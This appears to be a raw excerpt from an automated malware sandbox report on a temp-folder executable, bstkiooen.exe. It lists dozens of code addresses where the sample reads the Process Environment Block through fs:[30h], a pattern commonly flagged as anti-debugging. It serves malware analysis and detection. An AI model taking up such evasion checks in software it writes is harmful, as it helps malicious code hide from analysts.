Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01653D34 mov eax, dword ptr fs:[00000030h]	2_2_01653D34
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AD30 mov eax, dword ptr fs:[00000030h]	2_2_0164AD30
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016CA537 mov eax, dword ptr fs:[00000030h]	2_2_016CA537
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01674D3B mov eax, dword ptr fs:[00000030h]	2_2_01674D3B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167513A mov eax, dword ptr fs:[00000030h]	2_2_0167513A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649100 mov eax, dword ptr fs:[00000030h]	2_2_01649100
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164B1E1 mov eax, dword ptr fs:[00000030h]	2_2_0164B1E1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D41E8 mov eax, dword ptr fs:[00000030h]	2_2_016D41E8
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165D5E0 mov eax, dword ptr fs:[00000030h]	2_2_0165D5E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016F8DF1 mov eax, dword ptr fs:[00000030h]	2_2_016F8DF1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016735A1 mov eax, dword ptr fs:[00000030h]	2_2_016735A1
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016761A0 mov eax, dword ptr fs:[00000030h]	2_2_016761A0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C69A6 mov eax, dword ptr fs:[00000030h]	2_2_016C69A6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01671DB5 mov eax, dword ptr fs:[00000030h]	2_2_01671DB5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C51BE mov eax, dword ptr fs:[00000030h]	2_2_016C51BE
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A185 mov eax, dword ptr fs:[00000030h]	2_2_0167A185
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166C182 mov eax, dword ptr fs:[00000030h]	2_2_0166C182
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672581 mov eax, dword ptr fs:[00000030h]	2_2_01672581
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01642D8A mov eax, dword ptr fs:[00000030h]	2_2_01642D8A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672990 mov eax, dword ptr fs:[00000030h]	2_2_01672990
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167FD9B mov eax, dword ptr fs:[00000030h]	2_2_0167FD9B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01702073 mov eax, dword ptr fs:[00000030h]	2_2_01702073
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01711074 mov eax, dword ptr fs:[00000030h]	2_2_01711074
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166746D mov eax, dword ptr fs:[00000030h]	2_2_0166746D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A44B mov eax, dword ptr fs:[00000030h]	2_2_0167A44B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01660050 mov eax, dword ptr fs:[00000030h]	2_2_01660050
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DC450 mov eax, dword ptr fs:[00000030h]	2_2_016DC450
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167002D mov eax, dword ptr fs:[00000030h]	2_2_0167002D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167BC2C mov eax, dword ptr fs:[00000030h]	2_2_0167BC2C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165B02A mov eax, dword ptr fs:[00000030h]	2_2_0165B02A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01714015 mov eax, dword ptr fs:[00000030h]	2_2_01714015
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6C0A mov eax, dword ptr fs:[00000030h]	2_2_016C6C0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01701C06 mov eax, dword ptr fs:[00000030h]	2_2_01701C06
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7016 mov eax, dword ptr fs:[00000030h]	2_2_016C7016
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171740D mov eax, dword ptr fs:[00000030h]	2_2_0171740D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_017014FB mov eax, dword ptr fs:[00000030h]	2_2_017014FB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C6CF0 mov eax, dword ptr fs:[00000030h]	2_2_016C6CF0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718CD6 mov eax, dword ptr fs:[00000030h]	2_2_01718CD6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov ecx, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DB8D0 mov eax, dword ptr fs:[00000030h]	2_2_016DB8D0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016890AF mov eax, dword ptr fs:[00000030h]	2_2_016890AF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov ecx, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167F0BF mov eax, dword ptr fs:[00000030h]	2_2_0167F0BF
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649080 mov eax, dword ptr fs:[00000030h]	2_2_01649080
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C3884 mov eax, dword ptr fs:[00000030h]	2_2_016C3884
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165849B mov eax, dword ptr fs:[00000030h]	2_2_0165849B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB60 mov ecx, dword ptr fs:[00000030h]	2_2_0164DB60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165FF60 mov eax, dword ptr fs:[00000030h]	2_2_0165FF60
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718F6A mov eax, dword ptr fs:[00000030h]	2_2_01718F6A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01673B7A mov eax, dword ptr fs:[00000030h]	2_2_01673B7A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164DB40 mov eax, dword ptr fs:[00000030h]	2_2_0164DB40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165EF40 mov eax, dword ptr fs:[00000030h]	2_2_0165EF40
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718B58 mov eax, dword ptr fs:[00000030h]	2_2_01718B58
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164F358 mov eax, dword ptr fs:[00000030h]	2_2_0164F358
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01644F2E mov eax, dword ptr fs:[00000030h]	2_2_01644F2E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167E730 mov eax, dword ptr fs:[00000030h]	2_2_0167E730
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A70E mov eax, dword ptr fs:[00000030h]	2_2_0167A70E
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170131B mov eax, dword ptr fs:[00000030h]	2_2_0170131B
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166F716 mov eax, dword ptr fs:[00000030h]	2_2_0166F716
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0171070D mov eax, dword ptr fs:[00000030h]	2_2_0171070D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016DFF10 mov eax, dword ptr fs:[00000030h]	2_2_016DFF10
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016703E2 mov eax, dword ptr fs:[00000030h]	2_2_016703E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016837F5 mov eax, dword ptr fs:[00000030h]	2_2_016837F5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C53CA mov eax, dword ptr fs:[00000030h]	2_2_016C53CA
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01715BA5 mov eax, dword ptr fs:[00000030h]	2_2_01715BA5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01651B8F mov eax, dword ptr fs:[00000030h]	2_2_01651B8F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FD380 mov ecx, dword ptr fs:[00000030h]	2_2_016FD380
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672397 mov eax, dword ptr fs:[00000030h]	2_2_01672397
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658794 mov eax, dword ptr fs:[00000030h]	2_2_01658794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167B390 mov eax, dword ptr fs:[00000030h]	2_2_0167B390
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C7794 mov eax, dword ptr fs:[00000030h]	2_2_016C7794
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0170138A mov eax, dword ptr fs:[00000030h]	2_2_0170138A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0165766D mov eax, dword ptr fs:[00000030h]	2_2_0165766D
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FB260 mov eax, dword ptr fs:[00000030h]	2_2_016FB260
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0168927A mov eax, dword ptr fs:[00000030h]	2_2_0168927A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718A62 mov eax, dword ptr fs:[00000030h]	2_2_01718A62
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0166AE73 mov eax, dword ptr fs:[00000030h]	2_2_0166AE73
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01649240 mov eax, dword ptr fs:[00000030h]	2_2_01649240
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01657E41 mov eax, dword ptr fs:[00000030h]	2_2_01657E41
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016D4257 mov eax, dword ptr fs:[00000030h]	2_2_016D4257
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164E620 mov eax, dword ptr fs:[00000030h]	2_2_0164E620
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFE3F mov eax, dword ptr fs:[00000030h]	2_2_016FFE3F
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164C600 mov eax, dword ptr fs:[00000030h]	2_2_0164C600
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01678E00 mov eax, dword ptr fs:[00000030h]	2_2_01678E00
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01658A0A mov eax, dword ptr fs:[00000030h]	2_2_01658A0A
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0164AA16 mov eax, dword ptr fs:[00000030h]	2_2_0164AA16
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01663A1C mov eax, dword ptr fs:[00000030h]	2_2_01663A1C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_0167A61C mov eax, dword ptr fs:[00000030h]	2_2_0167A61C
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672AE4 mov eax, dword ptr fs:[00000030h]	2_2_01672AE4
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016716E0 mov ecx, dword ptr fs:[00000030h]	2_2_016716E0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016576E2 mov eax, dword ptr fs:[00000030h]	2_2_016576E2
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01718ED6 mov eax, dword ptr fs:[00000030h]	2_2_01718ED6
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016736CC mov eax, dword ptr fs:[00000030h]	2_2_016736CC
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01672ACB mov eax, dword ptr fs:[00000030h]	2_2_01672ACB
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016FFEC0 mov eax, dword ptr fs:[00000030h]	2_2_016FFEC0
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01688EC7 mov eax, dword ptr fs:[00000030h]	2_2_01688EC7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016452A5 mov eax, dword ptr fs:[00000030h]	2_2_016452A5
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_016C46A7 mov eax, dword ptr fs:[00000030h]	2_2_016C46A7
Source: C:\Users\user\AppData\Local\Temp\bstkiooen.exe	Code function: 2_2_01710EA5 mov eax, dword ptr fs:[00000030h]	2_2_01710EA5
